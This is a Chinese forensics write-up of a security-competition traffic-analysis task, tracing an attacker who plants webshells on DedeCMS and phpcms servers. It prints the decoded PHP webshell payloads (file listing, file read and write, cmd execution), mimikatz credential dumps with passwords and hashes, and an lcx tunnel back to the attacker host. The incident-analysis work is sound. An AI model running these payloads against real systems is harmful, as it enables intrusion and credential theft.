WriteUps
信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题
所有题目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md
第四题_第1张图片](http://img.e-com-net.com/image/info10/79af68923ed745128925af5d8c9b9733.jpg)
image.png
有人在进行目录扫描
基本上可以确定 , 一个潜在的攻击者 , 以及被攻击者
攻击者 : 172.16.10.110
被攻击者 : 192.168.20.117
首先过滤出这两者之间的所有数据包
PS :
感觉还是在发现攻击者和被攻击者之后直接提取出他们之间的所有数据包比较靠谱#!/bin/bash #attack_dump.sh target_folder='attack' mkdir ${target_folder} for file in `ls *.pcap`; do echo "Dumping attack package in ${file}..." tcpdump -A -s 0 'host 172.16.10.110 or host 192.168.20.117' -r $file -w ${target_folder}/${file} echo "${file} Done!" done
同时也生成了 http 的数据包
还是感觉直接搜索 http 的文本来的比较快
首先直接 grep 看看有没有小马什么的
888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}[email protected]..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
不过居然是个文本文件 ?
第四题_第2张图片](http://img.e-com-net.com/image/info10/0cea744ae2fd4c9d8de38f4400cb87c4.jpg)
image.png
再往上下翻翻居然发现了一个小马
第四题_第3张图片](http://img.e-com-net.com/image/info10/d1c0fc0aaeb14b1f8a23b8ffb87156ec.jpg)
image.png
这里的小马好像有一些特征 :
比如说 :
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map
根据这个特性进行搜索
grep -n -C 5 'spider.html' http.txt | grep 'POST '
果然发现了两个小马 :
/9.php
/uploadfile/2017/0905/20170905055411283.php
image.png
猜想这两个小马可能是通过漏洞写入的
直接搜索 9.php 最开始出现的地方
第四题_第4张图片](http://img.e-com-net.com/image/info10/6204fc8b9cec4b0faef95b48af9b6d39.jpg)
image.png
第四题_第5张图片](http://img.e-com-net.com/image/info10/30e83e2c71d24f05a102cf6c97cd8b79.jpg)
image.png
搜索一下 /admin/file_manage_control.php
发现是织梦CMS
利用的漏洞应该是 :
http://www.cnblogs.com/LittleHann/p/4237578.html
可以看到首先攻击者利用了上述漏洞 9.php 写入服务器
第四题_第6张图片](http://img.e-com-net.com/image/info10/c766768d875748d687b129b7a29ba978.jpg)
image.png
而搜索另一个小马的时候却发现是直接就进行了利用
而且文件名是以时间的形式命名
猜想是利用了文件上传漏洞将文件上传到服务器的
根据数据包详情 , 找到了如下一篇文章 :
http://0day5.com/archives/4368/ (phpcms v9 前台 GetShell)
这个漏洞在利用的过程中用到了 1.txt
继续向前回溯
找到攻击者是通过 9.php 写入了 1.txt 这个文件
第四题_第7张图片](http://img.e-com-net.com/image/info10/4491e4226db947a795651a6ae4b18aba.jpg)
image.png
第四题_第8张图片](http://img.e-com-net.com/image/info10/20cfc5931cc64615ade5be27a274fba3.jpg)
image.png
继续向前分析 , 攻击者在触发 DedeCMS 写入 9.php 的时候需要得到管理员的密码
那么在这之前肯定对密码进行了爆破
grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c
第四题_第9张图片](http://img.e-com-net.com/image/info10/339bb5edf89c4e3392f3cc97eeb852ac.jpg)
image.png
经过寻找发现 , 攻击者几乎是已经知道了登录后台的密码 , 并没有经过爆破 , 而是直接登录
第四题_第10张图片](http://img.e-com-net.com/image/info10/85d8d5afa6fa481981d2f5e2c65347c4.jpg)
image.png
gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=
用户名为 : admin
密码为 : 19901109
让攻击者直接知道密码就登录
可能性有很多
有可能是攻击者直接通过注入得到了管理员密码
也有可能是通过社工
也可能是敏感信息泄露等等
经过研究发现应该不会是明注得到的管理员密码
因为在流量包中不能检索到别的相同的字符串
image.png
尝试检测是否存在盲注的情况
...可能因为能力有限 , 并没有分析出来...
接下来可以看看攻击者都使用两个小马做了什么
首先看 9.php
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息
C:\phpStudy\WWW C: Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
./ 2017-09-05 17:34:52 0 0777
../ 2017-08-29 11:16:35 0 0777
a/ 2017-09-05 16:05:51 0 0777
admin/ 2017-09-05 16:05:51 0 0777
data/ 2017-09-05 16:18:01 0 0777
images/ 2017-09-05 16:03:30 0 0777
include/ 2017-09-05 16:03:21 0 0777
install/ 2017-09-05 16:06:08 0 0777
member/ 2017-09-05 16:03:24 0 0777
phpMyAdmin/ 2017-08-29 11:16:15 0 0777
plus/ 2017-09-05 16:05:51 0 0777
special/ 2017-09-05 16:05:51 0 0777
templets/ 2017-09-05 16:03:26 0 0777
uploads/ 2017-09-05 16:05:51 0 0777
9.php 2017-09-05 17:34:52 26 0666
favicon.ico 2010-03-11 15:45:00 1150 0666
index.php 2010-02-07 17:05:00 738 0666
robots.txt 2010-02-07 17:05:00 505 0666
tags.php 2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938 0666
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 whoami
wangguan-c938a1\administrator
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 ipconfig
Windows IP Configuration.
.
.
Ethernet adapter ........:.
.
Connection-specific DNS Suffix . : .
IP Address. . . . . . . . . . . . : 192.168.20.117.
Subnet Mask . . . . . . . . . . . : 255.255.255.0.
Default Gateway . . . . . . . . . : 192.168.20.1.
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 systeminfo
......: WANGGUAN-C938A1
OS ....: Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....: 5.2.3790 Service Pack 2 Build 3790
OS ......: Microsoft Corporation
OS ....: ..........
OS ........: Uniprocessor Free
............: wangguan
..........:
.... ID: 91353-645-7659413-50864
............: 2017-8-29, 10:14:19
............: 0 .. 2 .... 55 .. 11 ..
..........: VMware, Inc.
........: VMware Virtual Platform
........: x64-based PC
......: ...... 1 ..........
[01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....: UNKNOWN
Windows ....: C:\WINDOWS
........: C:\WINDOWS\system32
........: \Device\HarddiskVolume1
............: zh-cn;....(....)
..............: zh-cn;....(....)
....: (GMT+08:00) ....................................
............: 1,023 MB
..............: 379 MB
........: ......: 2,299 MB
........: ....: 1,854 MB
........: ......: 445 MB
............: C:\pagefile.sys
..: WORKGROUP
..........: \\WANGGUAN-C938A1
........: ...... 1 ............
[
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
[email protected]..
n.P......5..QP...."..01]: Q147222
....: ...... 1 .. NIC..
[01]: Intel(R) PRO/1000 MT Network Connection
......: ........
.... DHCP: ..
DHCP ......: 192.168.20.1
IP ....
[01]: 192.168.20.117
[S]
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// 使用 mimikatz.exe 搜集系统密码并输出到 C:\\phpStudy\\WWW\\log.txt 中
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt
.#####. mimikatz 2.1.1 (x64) built on Apr 9 2017 23:24:20
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 21 modules * * */
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2017-9-5 14:40:42
SID : S-1-5-20
msv :
[00000002] Primary
* Username : WANGGUAN-C938A1$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : WANGGUAN-C938A1$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : wangguan-c938a1$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 216713 (00000000:00034e89)
Session : Interactive from 0
Us
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
[email protected]..
n.P...#U....8P....n..er Name : Administrator
Domain : WANGGUAN-C938A1
Logon Server : WANGGUAN-C938A1
Logon Time : 2017-9-5 14:41:24
SID : S-1-5-21-2640452580-1396535521-4086226850-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : WANGGUAN-C938A1
* LM : 1160eb40860de5aeb75e0c8d76954a50
* NTLM : 74e0fa3bf5a67fd3b43ed8912042fabb
* SHA1 : 9d464a83db1089ff0b49c72938d2806953594714
wdigest :
* Username : Administrator
* Domain : WANGGUAN-C938A1
* Password : mtfly@123
kerberos :
* Username : Administrator
* Domain : WANGGUAN-C938A1
* Password : mtfly@123
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2017-9-5 14:40:42
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2017-9-5 14:40:42
SID :
msv :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType f
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// 写入文件 C:\\phpStudy\\WWW\\1.txt
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
然后再看另一个小马文件 :
grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
http ›› ipython
In [1]: with open("base64") as f:
...: for line in f:
...: print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/crons/ 下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
X@Yphpsso_server/ 2017-09-03 03:31:30 4096 0777
api/ 2017-09-03 03:31:44 4096 0777
statics/ 2017-09-03 03:31:44 4096 0777
caches/ 2017-09-03 03:45:14 4096 0777
./ 2017-09-03 03:38:34 4096 0777
html/ 2017-09-03 03:37:50 4096 0777
phpcms/ 2017-09-03 03:31:27 4096 0777
../ 2017-09-03 03:30:49 4096 0755
uploadfile/ 2017-09-05 02:25:38 4096 0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php 2017-09-03 03:31:44 3593 0777
favicon.ico 2017-09-03 03:31:44 3158 0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php 2017-09-03 03:31:44 48 0777
robots.txt 2017-09-03 03:31:44 170 0777
index.php 2017-09-03 03:31:44 313 0777
index.html 2017-09-05 00:13:08 9578 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/api.php 内容
get_one(array('userid'=>$_userid),'islock');
if($memberinfo['islock']) exit('Bad Request!
');
}
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback'])) unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
include PHPCMS_PATH.'api/'.$op.'.php';
} else {
exit('API handler does not exist');
}
?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/ 下的所有文件
model/ 2017-09-03 03:31:17 4096 0777
libs/ 2017-09-03 03:31:16 4096 0777
languages/ 2017-09-03 03:31:15 4096 0777
./ 2017-09-03 03:31:27 4096 0777
plugin/ 2017-09-03 03:31:27 4096 0777
templates/ 2017-09-03 03:31:27 4096 0777
../ 2017-09-03 03:38:34 4096 0777
modules/ 2017-09-03 03:31:27 4096 0777
base.php 2017-09-03 03:31:15 8462 0777
index.html 2017-09-03 03:31:15 1 0777
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/phpcms/base.php 内容
'/',
//Session....
'session_storage' => 'mysql',
'session_ttl' => 1800,
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,
//Cookie....
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,
'tpl_edit'=> 0,//....................
//............
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
'admin_log' =>
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
E....;@...Q|...u..
n..".-. 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn', //..........
'lock_ex' => '1', //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1', //........phpsso
'phpsso_appid' => '1', //....id
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server', //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1', //..................
'sina_akey' => '', //sina AKEY
'sina_skey' => '', //sina SKEY
'snda_akey' => '', //.......... akey
'snda_skey' => '', //.......... skey
'qq_akey' => '', //qq skey
'qq_skey' => '', //qq skey
'qq_appkey' => '', //QQ........ appkey
'qq_appid' => '', //QQ........ appid
'qq_callback' => '', //QQ........ callback
'admin_url' => '', //..................
);
?>
